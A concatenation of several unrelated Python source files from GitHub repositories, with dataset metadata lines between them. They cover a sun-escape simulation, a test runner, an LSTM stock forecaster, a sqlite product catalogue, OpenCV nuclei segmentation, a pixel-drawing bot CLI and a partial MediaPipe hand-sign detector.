average_escape_text = ax.text2D(0.005, 0.005, '', transform=ax.transAxes, fontsize=10, color='black')
escape_count_text = ax.text2D(0.005, 0.035, '', transform=ax.transAxes, fontsize=10, color='black')
iteration_count_text = ax.text2D(0.005, 0.07, '', transform=ax.transAxes, fontsize=10, color='black')
# Create the animation
ani = FuncAnimation(fig, animate, frames=num_iterations, init_func=init, interval = 0.1, blit=True, repeat=False)
# Create a sphere to represent the Sun
u = np.linspace(0, 2 * np.pi, 100)
v = np.linspace(0, np.pi, 100)
x_sun = sun_radius * np.outer(np.cos(u), np.sin(v))
y_sun = sun_radius * np.outer(np.sin(u), np.sin(v))
z_sun = sun_radius * np.outer(np.ones(np.size(u)), np.cos(v))
ax.plot_surface(x_sun, y_sun, z_sun, color='yellow', alpha=0.3)
# Define Plot
ax.set_title('Psudo Sun Simulator')
ax.set_xlim(-150, 150)
ax.set_ylim(-150, 150)
ax.set_zlim(-150, 150)
plt.show()
# Create a histogram with 1000 bins
histogram = input("Histogram plot? (y or any other key for no): ")
if histogram == 'y':
plt.figure()
plt.hist(escape_times, bins=1000, color='blue', alpha=0.7)
plt.xlabel('Escape Time')
plt.ylabel('Frequency')
plt.title('Escape Time Histogram')
plt.show()
| shafransky93/PsudoSunSimulator | randwalk.py | randwalk.py | py | 6,660 | python | en | code | 0 | github-code | 36 |
38826761471 | from subprocess import Popen, PIPE
from os import listdir
from os.path import isfile, join
from filecmp import cmp
import time
dirs = [('error_tests', ''),
('Tests', ''),
('ex1_Tests', ''),
('rotate_error_tests', '-rotate')]
for dir, args in dirs:
print("run %s tests" % dir)
tests = [f for f in listdir(dir) if isfile(join(dir, f)) and join(dir, f).endswith(".in")]
for test in tests:
if args == '':
p = Popen(['./ex3', join(dir,test), 'b'], stdin=PIPE, stdout=PIPE, stderr=PIPE)
else:
p = Popen(['./ex3', join(dir, test), 'b', args], stdin=PIPE, stdout=PIPE, stderr=PIPE)
time.sleep(0.1)
output_file = join(dir,test.replace('.in','.out'))
with open("b") as f1:
with open(output_file) as f2:
str1 = f1.read()
str2 = f2.read()
if str1 != str2:
print("test - %s\noutput - %s\n" % (test, output_file))
print(str1 + "\n\n" + str2)
| tauCourses/puzzel | error_tests.py | error_tests.py | py | 1,047 | python | en | code | 0 | github-code | 36 |
13957012079 | import tensorflow as tf
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from numpy.random import random_integers
import os
import pandas as pd
from math import floor
# Matplotlib fig params
mpl.rcParams['figure.figsize'] = (8, 6)
mpl.rcParams['axes.grid'] = False
# Enable eager for easy to use TF
#tf.enable_eager_execution()
def getData(location):
# Get the data into pandas df
data = pd.read_csv(location)
# Univariate data for close indexed on data -> numpy array
uni_data = data.iloc[:, 5]
uni_data.index = data['Date']
uni_data = uni_data.values
return uni_data
def univariate_data(dataset, start_index, end_index, history_size, target_size):
data = []
labels = []
start_index = start_index + history_size
if end_index is None:
end_index = len(dataset) - target_size
for i in range(start_index, end_index):
# Every group of 20
indices = range(i - history_size, i)
# Reshape data from (history_size,) to (history_size, 1)
# Data is now groups of 20 records - x data
data.append(np.reshape(dataset[indices], (history_size, 1)))
# Labels = the day to predict in question - y data
labels.append(dataset[i + target_size])
return np.array(data), np.array(labels)
def getData(location):
# Get the data into pandas df
data = pd.read_csv(location)
# Univariate data for close indexed on data -> numpy array
uni_data = data.iloc[:, 5]
uni_data.index = data['Date']
uni_data = uni_data.values
return uni_data
def normalizeData(TRAIN, uni_data):
# Getting training data metrics
uni_train_min = np.amin(uni_data[:TRAIN])
uni_train_max = np.amax(uni_data[:TRAIN])
uni_data = (uni_data - uni_train_min) / uni_train_max
return uni_data, uni_train_min, uni_train_max
def trainValSplit(uni_data, TRAIN, HISTORIC_REC, TARGET_REC):
# This will be:
# x = previous records
# y = next record prediction
x_train_uni, y_train_uni = univariate_data(uni_data, 0, TRAIN,
HISTORIC_REC,
TARGET_REC)
x_val_uni, y_val_uni = univariate_data(uni_data, TRAIN, None,
HISTORIC_REC,
TARGET_REC)
return x_train_uni, y_train_uni, x_val_uni, y_val_uni
def create_time_steps(length):
return list(range(-length, 0))
def show_plot(plot_data, delta, title):
labels = ['History', 'True Future', 'Model Prediction']
marker = ['.-', 'rx', 'go']
time_steps = create_time_steps(plot_data[0].shape[0])
if delta:
future = delta
else:
future = 0
plt.title(title)
for i, x in enumerate(plot_data):
if i:
plt.plot(future, plot_data[i], marker[i], markersize=10,
label=labels[i])
else:
plt.plot(time_steps, plot_data[i].flatten(), marker[i], label=labels[i])
plt.legend()
plt.xlim([time_steps[0], (future + 5) * 2])
plt.xlabel('Time-Step')
return plt
def showSampleExample(x_train_uni, y_train_uni, val):
plot = show_plot([x_train_uni[val], y_train_uni[val]], 0, 'Sample Example')
plt.show()
def baseline(history):
return np.mean(history)
def showBaselinePrediction(x_train_uni, y_train_uni, val):
plot = show_plot([x_train_uni[val], y_train_uni[val], baseline(x_train_uni[val])], 0,
'Baseline Prediction Example')
plt.show()
def batchAndShuffleData(BUFFER_SIZE, BATCH_SIZE, x_train_uni, y_train_uni, x_val_uni, y_val_uni):
train_univariate = tf.data.Dataset.from_tensor_slices((x_train_uni, y_train_uni))
train_univariate = train_univariate.cache().shuffle(BUFFER_SIZE).batch(BATCH_SIZE, drop_remainder=True).repeat()
val_univariate = tf.data.Dataset.from_tensor_slices((x_val_uni, y_val_uni))
val_univariate = val_univariate.batch(BATCH_SIZE, drop_remainder=True).repeat()
return train_univariate, val_univariate
def createModel(tensorShape):
simple_lstm_model = tf.keras.models.Sequential([
tf.keras.layers.LSTM(8, input_shape=tensorShape),
tf.keras.layers.Dense(1)
])
simple_lstm_model.compile(optimizer='adam', loss='mae')
return simple_lstm_model
# for x, y in val_univariate.take(1):
# print(simple_lstm_model.predict_on_batch(x).shape)
##### 2
def CreateModel(train_data_shape):
model = createModel(train_data_shape[-2:])
return model
##### 1
def PrepTrainData(location):
HISTORIC_REC = 30
TARGET_REC = 0
BATCH_SIZE = 1
BUFFER_SIZE = 200
data = getData(location)
TRAIN = floor(0.8 * len(data))
ndata, nmin, nmax = normalizeData(TRAIN, data)
x_train_uni, y_train_uni, x_val_uni, y_val_uni = trainValSplit(ndata, TRAIN, HISTORIC_REC, TARGET_REC)
train_univariate, val_univariate = batchAndShuffleData(BUFFER_SIZE, BATCH_SIZE, x_train_uni, y_train_uni, x_val_uni, y_val_uni)
return train_univariate, val_univariate, x_train_uni.shape
#### 3
def TrainModel(model, train_univariate, val_univariate, filename):
EVALUATION_INTERVAL = 200
EPOCHS = 50
model.fit(train_univariate, epochs=EPOCHS,
steps_per_epoch=EVALUATION_INTERVAL,
validation_steps=50,
validation_data=val_univariate)
model.save("trained/trained_model"+filename)
return model
def LoadModel(m_name):
model = tf.keras.models.load_model(m_name)
return model
def GetPrediction(dataset, model, forecast):
if forecast > 30:
forecast = 30
# plt.plot(data)
hdata, nmin, nmax = normalizeData(len(dataset), dataset)
hdata = hdata[-30:]
p_ya = np.array([])
p_x = np.arange(len(dataset), len(dataset) + forecast)
for x in range(0, forecast):
hdata = hdata.reshape(1, 30, 1)
y_hat = model.predict(hdata)
y_hat = Noys(y_hat)
# if abs(y_hat - p_ya[-1]) > 0.5*y_hat:
# y_hat = y_hat/5
hdata = np.append(hdata, y_hat)
hdata = np.delete(hdata, 0)
p_ya = np.append(p_ya, y_hat)
p_ya = p_ya * nmax + nmin
diffy = dataset[-1] - p_ya[0]
p_ya = p_ya + diffy
# plt.plot(p_x, p_ya)
# plt.show()
return np.ndarray.tolist(p_ya)
def Noys(y_hat):
noys = random_integers(-2, 2)
if noys % 2 == 0:
if noys > 1:
y_hat = y_hat + y_hat*0.30
elif noys < 1:
y_hat = y_hat - y_hat*0.30
else:
if noys > 1:
y_hat = y_hat + y_hat*0.15
elif noys < 1:
y_hat = y_hat - y_hat*0.15
return y_hat
def GetTrainedModel(path: str):
t_m = LoadModel(path)
return t_m
# GetPrediction('../data/AAPL.csv', t_m, 20)
def TrainSet():
model = CreateModel((30, 1))
for filename in os.listdir("/Users/christopherochs/financial-forecasting-api/models/data"):
if filename.endswith(".csv"):
print('../data/' + filename)
train, val, t_shape = PrepTrainData('../data/' + filename)
model = TrainModel(model, train, val, filename)
def TestModels(filename, dataname):
model = LoadModel('trained/'+filename)
d = getData('../data/' + dataname)
d = d[-100:]
p_x = np.arange(len(d), len(d) + 5)
y = GetPrediction(d, model, 5)
plt.title(filename + " on " + dataname)
plt.plot(d)
plt.plot(p_x, y)
plt.show()
| ptallo/financial-forecasting-api | models/univarmodel.py | univarmodel.py | py | 7,529 | python | en | code | 0 | github-code | 36 |
1467605788 | # from PIL import Image
#
# def abrirImagem():
# im = Image.open("sample-image.png")
#
#
import csv
import sqlite3
from PIL import Image
def abrir_imagem(imagem):
#im = Image.open("sample-image.png")
im = Image.open(imagem)
im.show()
def consultar_imagem(item):
try:
con = sqlite3.connect('catalogo.db')
cur = con.cursor()
dados = (item[0])
cur.execute('SELECT imagem FROM produtos WHERE codcli = ?',(dados,))
con.commit()
resposta = cur.fetchone()
nome_arquivo = f'c:\marcelo\projetos\python\catalogo\imgconv\{item[0]}.jpg'
writeTofile(resposta[0], nome_arquivo)
abrir_imagem(nome_arquivo)
print(f'Código {item[0]} consultado com sucesso.')
cur.close()
con.close()
except sqlite3.Error as erro:
print(f'Erro na consulta {item[0]}.',erro)
def convertToBinaryData(filename):
# Convert digital data to binary format
with open(filename, 'rb') as file:
binaryData = file.read()
return binaryData
def writeTofile(data, filename):
# Convert binary data to proper format and write it on Hard Disk
with open(filename, 'wb') as file:
file.write(data)
print(filename)
print("Stored blob data into: ", filename, "\n")
def inserir_bd(item):
try:
con = sqlite3.connect('catalogo.db')
cur = con.cursor()
cur.execute('insert into prod_cliente (codpro, descricao, embalagem, preco_cx, preco_un, cod_barras, categoria) values (?,?,?,?,?,?,?)',item,)
con.commit()
#print(f'Item {item[0]} incluso com sucesso.')
cur.close()
con.close()
except sqlite3.Error as erro:
print(f'Erro na inclusão {item[0]}.',erro)
def contar_itens():
con = sqlite3.connect('catalogo.db')
cur = con.cursor()
cur.execute('SELECT * FROM prod_cliente',)
print(f'Quantidade de itens inseridos no catálogo: {len(cur.fetchall())}')
cur.close()
con.close()
def inserir_imagem(item):
try:
con = sqlite3.connect('catalogo.db')
cur = con.cursor()
dados = (None,item[6], item[0])
cur.execute('INSERT INTO produtos (cod_barras, imagem, codcli) values (?, ?, ?)',dados,)
con.commit()
print(f'Código {item[0]} atualizado com sucesso.')
cur.close()
con.close()
except sqlite3.Error as erro:
print(f'Erro na atualização {item[0]}.',erro)
def atualizar_bd(item):
try:
con = sqlite3.connect('catalogo.db')
cur = con.cursor()
#soh atualiza com preco diferente
# dados = (item[1],item[2], item[3], item[4],item[5], item[6], item[0],item[3])
# cur.execute('UPDATE prod_cliente SET descricao = ?, embalagem = ?, preco_cx = ?, preco_un = ?, cod_barras = ?, categoria = ? WHERE codpro = ? and preco_cx != ?',dados,)
#atualiza tudo
dados = (item[1],item[2], item[3], item[4],item[5], item[6], item[0])
cur.execute('UPDATE prod_cliente SET descricao = ?, embalagem = ?, preco_cx = ?, preco_un = ?, cod_barras = ?, categoria = ? WHERE codpro = ?',dados,)
con.commit()
print(f'Código {item[0]} atualizado com sucesso.')
cur.close()
con.close()
except sqlite3.Error as erro:
print(f'Erro na atualização {item[0]}.',erro)
def ler_arquivo():
with open ('produtos.txt', 'r') as f:
lista = []
for row in csv.reader(f,delimiter=';'):
lista.append(row)
for linha in lista:
item = []
preco_novo = linha[6].replace(',','.')
preco_novo = "{:.2f}".format(float(preco_novo))
##Troca , por .
preco_novo_un = linha[8].replace(',','.')
##tranforma para numero real com 2 digitos apos o ponto
preco_novo_un = "{:.2f}".format(float(preco_novo_un))
# if preco_novo_un == '0.00':
# print("Código: " + linha[0] + " Descrição: " + linha[1] + " Emb: " + linha[3] + " Preço un: R$ " + str(
# preco_novo))
# else:
# print("Código: "+linha[0]+" Descrição: "+linha[1]+" Emb: "+linha[3]+" Preço cx: R$ "+str(preco_novo)+ " Preço un: R$ "+str(preco_novo_un))
item.append(linha[0])
item.append(linha[1])
item.append(linha[3])
item.append(linha[6])
if linha[8] !='0':
item.append(linha[8])
else:
item.append(linha[6])
item.append(0000000000000) #codigo de barras
categoria = linha[11].split(' ')
#print(categoria[1])
#Coloca os nomes das categorias no BD
#categoria = linha[11]
if categoria[1] == 'ADAMS' or categoria[1] == 'ARCOR' or categoria[1] == 'CAMPESTRE' or categoria[1] == 'DALVA' or categoria[1] == 'DORI' or categoria[1] == 'AMENDUPA' or categoria[1] == 'FINI' or categoria[1] == 'FLORESTAL' or categoria[1] == 'Jazam' or categoria[1] == 'LUIZ' or categoria[1] == 'PECCIN' or categoria[1] == 'RICLAN' or categoria[1] == 'SANTA' or categoria[1] == 'Uniao' or categoria[1] == 'GAROTO' or categoria[1] == 'Quero' or categoria[1] == 'NESTLE':
item.append('DOCES e SALGADINHOS')
#categoria[1]= 'DOCES e SALGADINHOS'
elif categoria[1] == 'BDL' or categoria[1] == 'ADN' or categoria[1] == 'BIC' or categoria[1] == 'DEYCON' or categoria[1] == 'FEIJAO' or categoria[1] == 'ERVA' or categoria[1] == 'FEIJAO' or categoria[1] == 'GERAL' or categoria[1] == 'KRAFT' or categoria[1] == 'LIMPINHA' or categoria[1] == 'MARANATA' or categoria[1] == 'MARTINS' or categoria[1] == 'MEMPHIS' or categoria[1] =='OWENS-ILLINOIS' or categoria[1] == 'VASSOURAS' or categoria[1] == 'ZETTAPACK'or categoria[1] == 'TELL'or categoria[1] == 'ODERICH' or categoria[1] == 'Mococa' or categoria[1] == 'Queijo' :
item.append('MERCEARIA')
#categoria[1] == 'MERCEARIA'
elif categoria[1] == 'FONT' or categoria[1] == 'BEBIDAS' or categoria[1] == 'PINGO' or categoria[1] == 'SUCO':
item.append('BEBIDAS')
#categoria[1] == 'BEBIDAS'
elif categoria[1] == 'GIRANDO' or categoria[1] == 'SANY' or categoria[1] == 'BRILHOLAC':
#categoria[1] == 'GIRANDO SOL'
item.append('LIMPEZA')
elif categoria[1] == 'DU':
#categoria[1] == 'CONDIMENTOS'
item.append('CONDIMENTOS')
elif categoria[1] == 'ELMA':
#categoria[1] == 'ELMA CHIPS'
item.append('ELMA CHIPS')
elif categoria[1] == 'Biscoitos':
item.append('Biscoitos SAGRA')
elif categoria[1] == 'TUBARAO' or categoria[1] == 'SIRIUS' or categoria[1] == 'HIGIE' or categoria[1] == 'TISCOSKI' or categoria[1] == 'GREEN' or categoria[1] == 'FRALDA':
#categoria[1] == 'HIGIENE PESSOAL'
item.append('HIGIENE PESSOAL')
elif categoria[1] == 'MC' or categoria[1] == 'ORLEPLAST' or categoria[1] == 'PLAZAPEL' or categoria[1] == 'LIPLAST' or categoria[1] == 'TOTALPLAST'or categoria[1] == 'EMBRAST'or categoria[1] == 'VABENE':
#categoria[1] == 'DESCARTÁVEIS'
item.append('DESCARTÁVEIS')
elif categoria[1] == 'MULTINACIONAL' or categoria[1] == 'PLASCOR' or categoria[1] == 'RELUZ' or categoria[1] == 'OUROLUX' or categoria[1] == 'PARANA'or categoria[1] == 'PIRISA' or categoria[1] == 'BLUMENAU' or categoria[1] == 'Alcool' or categoria[1] == 'CARVAO' or categoria[1] == 'THREE' or categoria[1] == 'FIBRAFORM':
#categoria[1] == 'UTILIDADES'
item.append('BAZAR E UTILIDADES')
else:
item.append(categoria[1])
#Aqui insere todos os itens novamente
inserir_bd(item)
#Aqui eh pra usar opcao de atualizar os preços
#atualizar_bd(item)
#img = convertToBinaryData('img/semfoto.jpg')
#item.append(img)
#inserir_imagem(item)
def listar_produtos():
try:
con = sqlite3.connect('catalogo.db')
cur = con.cursor()
produtos=[]
# cur.execute('SELECT codpro, descricao, categoria, embalagem, preco_cx, preco_un FROM prod_cliente ORDER BY categoria, descricao')
cur.execute(
'SELECT codpro, descricao, categoria, embalagem, preco_cx, preco_un, categoria FROM prod_cliente WHERE categoria NOT Null ORDER BY categoria, descricao')
produtos = cur.fetchall()
cur.close()
con.close()
return produtos
except sqlite3.Error as erro:
print('Erro na consulta.',erro)
def apagar_itens_cliente():
try:
con = sqlite3.connect('catalogo.db')
cur = con.cursor()
cur.execute(
'DELETE FROM prod_cliente')
print(f'Total de itens apagados: {cur.rowcount}')
con.commit()
cur.close()
con.close()
except sqlite3.Error as erro:
print('Erro ao apagar itens do banco.',erro)
if __name__ == '__main__':
apagar_itens_cliente()
ler_arquivo()
contar_itens()
#tt = []
#tt.append('2327')
#consultar_imagem(tt)
| marcelocaon/gerador_catalogo_produtos | main.py | main.py | py | 9,572 | python | pt | code | 1 | github-code | 36 |
536521380 | import os
import cv2
import numpy as np
import skimage.exposure as sk_exposure
import matplotlib.pyplot as plt
from skimage.io import imshow, imread
from skimage.color import rgb2hsv, hsv2rgb
from skimage import color
from scipy.ndimage.filters import maximum_filter
from scipy.ndimage.morphology import generate_binary_structure, binary_erosion
low=40
high=60
kernel = np.ones((4,4), np.uint8)
path_image_contour= 'C:/Users/Laura/AppData/Local/Programs/Python/Python36/Phenotype/Paint/001'
FILENAME='C:/Users/Laura/AppData/Local/Programs/Python/Python36/Phenotype/Images/006/TCGA-001-tile-r12-c5-x4096-y11264-w1024-h1024.PNG' #image can be in gif jpeg or png format
path_image_final = 'C:/Users/Laura/AppData/Local/Programs/Python/Python36/Phenotype/Images/Image_seg'
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
#img=cv2.imread(FILENAME)
#imgplot = plt.imshow(img)
#plt.show()
kernel_dil = np.ones((3,3), np.uint8)
#def contour_img (path_image_contour) :
list_img = os.listdir(path_image_contour)
for annot_num, annotation_tif in (enumerate(list_img)):
imagepath =path_image_contour+'/'+ annotation_tif
print(annotation_tif)
img = cv2.imread(imagepath,1)
p= os.path.basename(annotation_tif)
name1 = os.path.splitext(p)[0]
fname = name1 + '.png'
path_image_final_1 = os.path.join(path_image_final,fname)
img= cv2.resize(img, (364,364), interpolation = cv2.INTER_AREA)
cv2.imshow('',img)
cv2.waitKey(0)
img = cv2.erode(img, kernel_dil, iterations=1)
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
img_fin = np.zeros(img.shape, dtype=np.uint8)
# img_hsv = cv2.dilate(img_hsv, kernel, iterations=1)
lower_mask = img_hsv [:,:,0] > 90
upper_mask = img_hsv [:,:,0] < 130
saturation = img_hsv [:,:,1] > 100
mask = upper_mask*lower_mask *saturation
red = img[:,:,0]*mask
green = img[:,:,1]*mask
blue = img[:,:,2]*mask
red_girl_masked = np.dstack((red,green,blue))
red_girl_masked = cv2.cvtColor(red_girl_masked, cv2.COLOR_BGR2GRAY)
cv2.imshow('',red_girl_masked)
cv2.waitKey(0)
ret,threshNuclei = cv2.threshold(red_girl_masked,0,255,cv2.THRESH_BINARY)
contoursNuclei, hierarchy = cv2.findContours(threshNuclei,cv2.RETR_TREE ,cv2.CHAIN_APPROX_SIMPLE)
# cv2.drawContours(img ,contoursNuclei, -1, (0,255,0), 1)
# cv2.imshow('',img)
# cv2.waitKey(0)
for c in zip(contoursNuclei, hierarchy[0]):
if cv2.contourArea(c[0]) > 200:
if c[1][3] != -1:
temp = np.zeros(img.shape, dtype=np.uint8)
cv2.fillPoly(temp, pts=[c[0]], color=(255, 255, 255))
# cv2.imshow('',temp)
# cv2.waitKey(0)
masked_image = cv2.bitwise_and(img, temp)
Mask_black = cv2.bitwise_not(masked_image)
mask_ = cv2.bitwise_not(temp)
masked_image_ = cv2.bitwise_or(masked_image, mask_)
temp_1 = cv2.cvtColor(temp, cv2.COLOR_BGR2GRAY )
#image_max = ndi.maximum_filter(masked_image_, size=20, mode='constant')
dst = cv2.cornerHarris(temp_1,12,13,0.20)
dst = cv2.dilate(dst,None)
masked_image_shape = (masked_image_[dst>0.01*dst.max()]).shape
masked_image_[dst>0.01*dst.max()]=[0,0,255]
# cv2.imshow('dst',masked_image_)
# cv2.waitKey(0)
print( masked_image_shape[0])
if masked_image_shape[0]< 290:
img_fin = img_fin+temp
elif len(masked_image_[dst>0.09*dst.max()])<210:
img_fin = img_fin+temp
# cv2.imshow('',img_fin)
# cv2.waitKey(0)
cv2.imwrite(path_image_final_1, img_fin)
cv2.imshow('',img_fin)
cv2.waitKey(0)
# cv2.drawContours(img ,contoursNuclei, -1, (0,255,0), 1)
| LauraMarin/Tesis_2023 | Unet_Nuclei_feature/Contour_seg.py | Contour_seg.py | py | 4,106 | python | en | code | 0 | github-code | 36 |
36109925973 | #!/usr/bin/env python3
#_main_.py
import writer
import getimage
import argparse
import os
from time import sleep
import gimmedahandler #import shit
##set up the parser
parser = argparse.ArgumentParser(
description= "A simple bot to place pixels from a picture to whatever you want \n Please note to write files with their according filetypes",
epilog= "Have fun with my Bot",
prefix_chars="-/",
add_help=False
)
# add arguments to the parser
parser.add_argument("-?", "--help", action="help", help="Show this help message")
parser.add_argument("--User_Interface", "-ui", action="store_true", dest="UI", help="Wether or not you will use the built-in User Interface. If given, will ignore all other parameters.")
parser.add_argument("-s", "--silence", "-s", action="store_true", dest="silence", help="If this parameter is given, the Program will not output anyting (exept fatal errors)")
parser.add_argument("-nc", "--no_colors", action="store_true", dest="nc", help="Wether to not use custom text coloring(e.g. if the output is saved to a file)")
parser.add_argument("-p", "--picture", type=str, dest="inpath", action="store", help="The path of the picture you want the Bot to draw.")
parser.add_argument("-h", "--handler", type=str, dest="handler", action="store", help="The file name of the handler that the Bot will use to draw your image.")
parser.add_argument("-sx", "--startx", type=int, dest="startx", action="store", help="The x coordinate of the top left corner of the canvas \n that the bot will draw your image into")
parser.add_argument("-sy", "--starty", type=int, dest="starty", action="store", help="The y coordinate of the top left corner of the canvas \n that the bot will draw your image into")
parser.add_argument("-ex", "--endx", type=int, dest="endx", action="store", help="The x coordinate of the bottom right corner of the canvas \n that the bot will draw your image into")
parser.add_argument("-ey", "--endy", type=int, dest="endy", action="store", help="The y coordinate of the bottom right corner of the canvas \n that the bot will draw your image into")
args = parser.parse_args() #parse the given arguments
#print("hehe", flush=True)
if args.UI and args.silence:
while True:
sleep(1)
#how you gonna use a invisible UI???
if args.nc: #creating a temporary file so that the toolset module knows wether or not to use custom colouring
f = open("nc.temp", "x")
f.close()
if args.UI == False and args.inpath == None and args.handler == None and args.startx == None and args.starty == None:
parser.parse_args(["-?"]) #return the help page if no args are given
#print(args.handler)
if args.UI:
image, size = getimage.imageprompt(args.UI) #getting the image stuff
handler = gimmedahandler.gethandler(args.handler, args.UI) #retriveving the handler
#print(handler)
startx, starty, endx, endy = writer.getcanvas(args.UI, args.startx, args.starty, args.endx, args.endy) # retrieving the info about the canvas coordinates from the user
writer.write(image, handler, startx, starty, endx, endy, size, args.UI, args.silence) #giving shit to the writing algorithms
if args.nc: #removing the temporary file
os.remove("./nc.temp")
else:
handler = gimmedahandler.gethandler(args.handler, args.UI) #prepping handler
image, size = getimage.imageprompt(args.UI, args.inpath) #prepping the given img
startx, starty, endx, endy = writer.getcanvas(args.UI, args.startx, args.starty, args.endx, args.endy) #checking the coords
writer.write(image, handler, startx, starty, endx, endy ,size, args.UI, args.silence) #writing the image to the canvas
if args.nc: #removing the temporary file
os.remove("./nc.temp")
| a-usr/pixelbot | _main_.py | _main_.py | py | 3,718 | python | en | code | 1 | github-code | 36 |
33147644172 | #!/usr/bin/env python3
# Class for parsing arguments
# from command line
# Allowed arguments are
# --help
# --source=file
# --source="file"
# --input=file
# --input="file"
import sys
import re
class ArgumentsParser:
"""
Parses input arguments into objects and return them
"""
@staticmethod
def parse():
args = {}
for argument in sys.argv[1:]:
# Search for --something=file pattern
if re.search("^--[a-zA-Z]*=.+$", argument):
splitedArg = argument.split("=")
args[splitedArg[0]] = splitedArg[1]
elif argument == '--help':
args[argument] = None
return args
| hondem/FIT | ipp_proj_1/arguments_parser.py | arguments_parser.py | py | 595 | python | en | code | 0 | github-code | 36 |
18306682831 | def purchases(n):
if n==1:
shipping=10.95
else:
shipping=10.95+((n-1)*2.95)
return shipping
n=int(input("Enter number of orders:"))
if n!=0:
amount=purchases(n)
print("Shipping charges=",amount)
else:
print("Invalid input")
| rohanxd1/Codes | Python/Internship/program9.py | program9.py | py | 264 | python | en | code | 0 | github-code | 36 |
17697981558 | import os
import sys
from time import time, sleep
from itertools import permutations
import pickle
import matplotlib.pyplot as plt
import cv2
import numpy as np
import pandas as pd
import mediapipe as mp
from sklearn.tree import DecisionTreeClassifier
from PIL import Image, ImageDraw, ImageFont
from torch import positive
def pil2cv(imgPIL):
imgCV_RGB = np.array(imgPIL, dtype = np.uint8)
imgCV_BGR = np.array(imgPIL)[:, :, ::-1]
return imgCV_BGR
def cv2pil(imgCV):
imgCV_RGB = imgCV[:, :, ::-1]
imgPIL = Image.fromarray(imgCV_RGB)
return imgPIL
def calc_deg(df, n1, n2, n3):
vec_a = df[[n1+'x', n1+'y']].values - df[[n2+'x', n2+'y']].values
vec_b = df[[n2+'x', n2+'y']].values - df[[n3+'x', n3+'y']].values
degs = []
for a, b in zip(vec_a, vec_b):
length_vec_a = np.linalg.norm(a)
length_vec_b = np.linalg.norm(b)
inner_product = np.inner(a, b)
cos = inner_product / (length_vec_a * length_vec_b)
rad = np.arccos(cos)
deg = np.rad2deg(rad)
degs.append(deg)
return np.radians(np.array(degs))
def preprocessing(df, n1, n2, n3, n4, feature=[]):
out = pd.DataFrame()
# 角度補正
rad = np.arctan2(df['9y'], df['9x'])
if not feature or 'rad' in feature: out['rad'] = rad
r = np.array([[np.cos(rad), -np.sin(rad)], [np.sin(rad), np.cos(rad)]])[:,:,0]
for j in range(21):
df[[str(j)+'x', str(j)+'y']] = df[[str(j)+'x', str(j)+'y']] @ r
# 極座標 r, θ
x = df[[n1+'x', n2+'x', n3+'x', n4+'x']].values
y = df[[n1+'y', n2+'y', n3+'y', n4+'y']].values
x = np.cumsum(x, axis=1)
y = np.cumsum(y, axis=1)
r = np.sqrt(x**2+y**2)
theta = np.arctan2(y, x)
if not feature or 'theta1' in feature: out['theta1'] = theta[:, 1] - theta[:, 0]
if not feature or 'theta2' in feature: out['theta2'] = theta[:, 2] - theta[:, 1]
if not feature or 'theta3' in feature: out['theta3'] = theta[:, 3] - theta[:, 2]
if not feature or 'r1' in feature: out['r1'] = r[:, 1] - r[:, 0]
if not feature or 'r2' in feature: out['r2'] = r[:, 2] - r[:, 1]
if not feature or 'r3' in feature: out['r3'] = r[:, 3] - r[:, 2]
for p in permutations([n1, n2, n3, n4], 3):
if not feature or 'a'+''.join(p) in feature: out['a'+''.join(p)] = calc_deg(df, p[0], p[1], p[2])
# 2点間の角度
if not feature or 'd'+n1 in feature: out['d'+n1] = np.degrees(np.arctan2(df[n1+'y'], df[n1+'x']))
if not feature or 'd'+n2 in feature: out['d'+n2] = np.degrees(np.arctan2(df[n2+'y']-df[n1+'y'], df[n2+'y']-df[n1+'x']))
if not feature or 'd'+n3 in feature: out['d'+n3] = np.degrees(np.arctan2(df[n3+'y']-df[n2+'y'], df[n3+'y']-df[n2+'x']))
if not feature or 'd'+n4 in feature: out['d'+n4] = np.degrees(np.arctan2(df[n4+'y']-df[n3+'y'], df[n4+'y']-df[n3+'x']))
if not feature or 'd'+n1+n3 in feature: out['d'+n1+n3] = np.degrees(np.arctan2(df[n3+'y']-df[n1+'y'], df[n3+'y']-df[n1+'x']))
if not feature or 'd'+n2+n4 in feature: out['d'+n2+n4] = np.degrees(np.arctan2(df[n4+'y']-df[n2+'y'], df[n4+'y']-df[n2+'x']))
if not feature or 'd'+n1+n4 in feature: out['d'+n1+n4] = np.degrees(np.arctan2(df[n4+'y']-df[n1+'y'], df[n4+'y']-df[n1+'x']))
# under is n4
if not feature or 'under is '+n4 in feature: out['under is '+n4] = (np.argmin(df[[n1+'y', n2+'y', n3+'y', n4+'y']].values, axis=1)) == 3
# top is n4
if not feature or 'top is '+n4 in feature: out['top is '+n4] = (np.argmax(df[[n1+'y', n2+'y', n3+'y', n4+'y']].values, axis=1)) == 3
# n1 vs n3
if not feature or n1+' vs '+n3 in feature: out[n1 + ' vs ' + n3] = df[n1+'y'] < df[n3+'y']
# dist 0 n1
if not feature or '0_'+n1 in feature: out[f'0_{n1}'] = np.sqrt((df['0x']-df[n1+'x'])**2 + (df['0y']-df[n1+'y'])**2 + 1e-10)
# dist 0 n2
if not feature or '0_'+n2 in feature: out[f'0_{n2}'] = np.sqrt((df['0x']-df[n2+'x'])**2 + (df['0y']-df[n2+'y'])**2 + 1e-10)
# dist 0 n3
if not feature or '0_'+n3 in feature: out[f'0_{n3}'] = np.sqrt((df['0x']-df[n3+'x'])**2 + (df['0y']-df[n3+'y'])**2 + 1e-10)
# dist 0 n4
if not feature or '0_'+n4 in feature: out[f'0_{n4}'] = np.sqrt((df['0x']-df[n4+'x'])**2 + (df['0y']-df[n4+'y'])**2 + 1e-10)
return out
import joblib
class BackEnd(object):
def __init__(self):
self.mp_pose = mp.solutions.pose
self.mp_holistic = mp.solutions.holistic
self.holistic = self.mp_holistic.Holistic(
min_detection_confidence=0.5,
min_tracking_confidence=0.5,
)
self.mp_drawing = mp.solutions.drawing_utils
self.a_dtree = joblib.load(os.path.join('weight', 'a.tree'))
self.b_dtree = joblib.load(os.path.join('weight', 'b.tree'))
self.c_dtree = joblib.load(os.path.join('weight', 'c.tree'))
def detection(self, pos):
start = time()
df = self.norm_mp_pos(pos)
features = ['r3', 'a171819', 'a171920', 'a182017', 'a182019', 'a201918', 'd1720']
df_ = preprocessing(df, '17', '18', '19', '20', features)
self.a_dtree.n_features_ = len(features)
prev = self.a_dtree.predict(df_)
ans = '未検出'
if prev == 1: ans = 'い'; print('i')
elif prev == 0:
features = ['0_12']
df_ = preprocessing(df, '8', '12', '16', '20', features)
